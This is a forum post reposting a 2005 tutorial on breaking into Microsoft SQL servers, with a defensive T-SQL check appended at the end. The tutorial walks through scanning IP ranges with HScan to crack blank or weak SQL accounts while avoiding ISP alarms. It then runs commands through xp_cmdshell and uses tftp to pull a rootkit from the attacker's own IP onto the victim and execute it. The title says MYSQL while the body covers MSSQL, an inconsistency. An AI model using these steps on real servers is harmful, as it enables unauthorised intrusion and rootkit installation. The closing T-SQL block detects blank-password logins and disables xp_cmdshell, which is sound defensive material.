MYSQL Hacking Tutorial
Posted by Centurion (Administrator), 10-09-2008, 03:37 AM, #1

MSSQL Hacking by wtfmates - 26-05-2005
wtfm4tes [at] gmail.com
=========================

I'm going to try to keep this tutorial as simple as possible. This tutorial will tell you how to find and exploit MSSQL servers.

You will need:

SQLExec (Google it, there's a few versions; the NetHackerIII version or the Green Apple one will suffice)
A Portscanner (h!!p://home.hccnet.nl/m3ssi4h.rul3z/)
HSCAN v1.20 (h!!p://home.hccnet.nl/m3ssi4h.rul3z/)
TFTPD32 (h!!p://tftpd32.jounin.net/)

Ok, I'll cover two ways to find MSSQL servers. Well, it's actually one way, just performed in slightly different ways.

First Method (Range Method):

Basically just load up HScan v1.20 (hscan_gui.exe) and go Menu -> Modules and uncheck everything except 'Check hostname of target'
and 'Check MSSQL weak accounts'. Now under Menu -> Parameters just enter a Start IP and an End IP, and adjust Max Threads/Host to whatever
you're comfortable with; when scanning from home I use 20 Threads and 5 Hosts. If scanning from a ScanStro (more on this later) I use
anywhere from 25 to 50 threads and anywhere from 10 to 20 hosts. I leave the Timeout and SleepTime at default and also leave 'Ping host
before scan' checked. Once you have this all set accordingly, click OK and then click Menu -> Start to start whoring whatever range you
selected.

What this will do is Ping -> Check TCP 1433 -> Resolve hostname -> Attempt to crack MSSQL Accts

To do this remotely from a scanstro using the normal hscan CLI, simply send a raw:

SITE EXEC hide.exe hscan.exe -h 192.168.0.1 192.168.0.254 -report -name -mssql -max 30,10

Second Method (List Method):

This is pretty much the exact same as the range method; you're using a host list instead of whoring a range. I prefer this method as it tends
to attract less attention and won't set off as many alarms at your ISP. Basically, in Parameters in hscan_gui just check off 'Hosts List'
and open a list of IPs with MSSQL servers running on them. To get such a list you can usually check your fav boards, or I'm sure there are
some scanners out there that have good enough logging options that can do it for you as well. Also, using your scanstro to portscan would
suffice as well. To perform a host-list-based MSSQL scan from a scanstro, simply send a raw like this:

SITE EXEC hide.exe hscan.exe -f hosts.txt -report -name -mssql -max 30,10

Exploiting:

Anywh0re, after the aforementioned scans are finished you should hopefully have some cracked accounts to play with. The scan results generated
by hscan are in HTML format and look a little something like this:

-----------------------------------------
192.168.0.151 (p1336.omgwtfhax.info)

192.168.0.152 (p1337.omgwtfhax.info)

[MYSQL SCAN]
Version: 4.1.8
Cracked account: root/[null]

192.168.0.153 (p1338.omgwtfhax.info)
-----------------------------------------

From what I can tell the 'NetHackerIII' version of sqlexec.exe is easier to find than the Green Apple one, so I'll use that one in my
examples. (MS-SQL Exec for NetHackerIII Version 1.0.0.0)

Open sqlexec.exe and you'll be prompted with some ghey screen (TianXing Free Registration Center)? Just click Later. Now this screen
should be pretty self-explanatory. In this case we would put 192.168.0.152 in the Host box and "root" without quotes in Username, and
Password is just left blank ([null] == nothing, derr). Hit Connect, and for a test command I use 'ver' instead of 'dir c:\', so my output
looks a little something like this:

-----------------------------------------
MS-SQL Exec for NetHackerIII Version 1.0.0.0
Copyright © TianXing Software Kingdom 1999-2001.
Programmed by ChenWeishan 2001.2
WEB: h!!p://www.tianxing.org , h!!p://www.softkingdom.net
Email: tianxing [at] 163.net
ICQ: 13101363 , OICQ: 911189

SQL>Connecting 192.168.0.152.
SQL>Connected to 192.168.0.152.
SQL>Command: xp_cmdshell "ver"
LzÃÂ�?öÀÈÑ�gC½ö ŠÃ‚¼Ã´=’ÃÂ�?öÀÈÑ�Ü�õ� ÃÂ�?Ñ�8¯"‚
Mcft Windows 2000 [Versão 5.00.2195]
Mcft Windows 2000 [Versão 5.00.2195]
-----------------------------------------

This is where TFTPD32 comes in. Run tftpd32.exe and make sure you set the 'Server interface' to your real IP and not your LAN one, should
it show up in the list. Now you can upload your favorite rootkit or scanstro to this box in the following fashion; send the command:

tftp -i 1.3.3.7 get rootkit.exe C:\winnt\system32\rootkit.exe

where 1.3.3.7 is your IP. Now send:

start C:\winnt\system32\rootkit.exe

That should execute the rootkit on the box; you can now close sqlexec and should have access via whatever means your rootkit
provides. Happy rooting!
-wtfmates
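Added here as a defensive counterpart, not part of wtfmates' tutorial or any tool it names: a T-SQL check that reports the two weaknesses the walkthrough depends on, SQL logins with an empty password and xp_cmdshell being enabled, and then turns xp_cmdshell off. It assumes SQL Server 2005 or later (sys.sql_logins and sys.configurations exist) and a sysadmin connection; on the Windows 2000 era servers in the post, xp_cmdshell was on by default.

```sql
-- Added defensive check; assumes SQL Server 2005+ and sysadmin rights.
-- The scan output in the post shows "root/[null]": a login with no password.
-- 1. Any SQL login whose password is the empty string.
SELECT name AS login_name, is_disabled
FROM sys.sql_logins
WHERE PWDCOMPARE('', password_hash) = 1;

-- 2. Whether the built-in sa login (SID 0x01) is still enabled; it is the
--    account brute-force scanners try first.
SELECT name AS login_name, is_disabled
FROM sys.sql_logins
WHERE sid = 0x01;

-- 3. Whether xp_cmdshell is switched on (value_in_use = 1 means enabled).
--    Every command in the post runs through this procedure.
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';

-- 4. Remediation: disable xp_cmdshell. 'show advanced options' must be on
--    before the xp_cmdshell option is visible to sp_configure.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
```

Queries 1 and 3 returning any row with value_in_use = 1 or a blank-password login are the conditions that let the sqlexec plus tftp sequence in the post work at all.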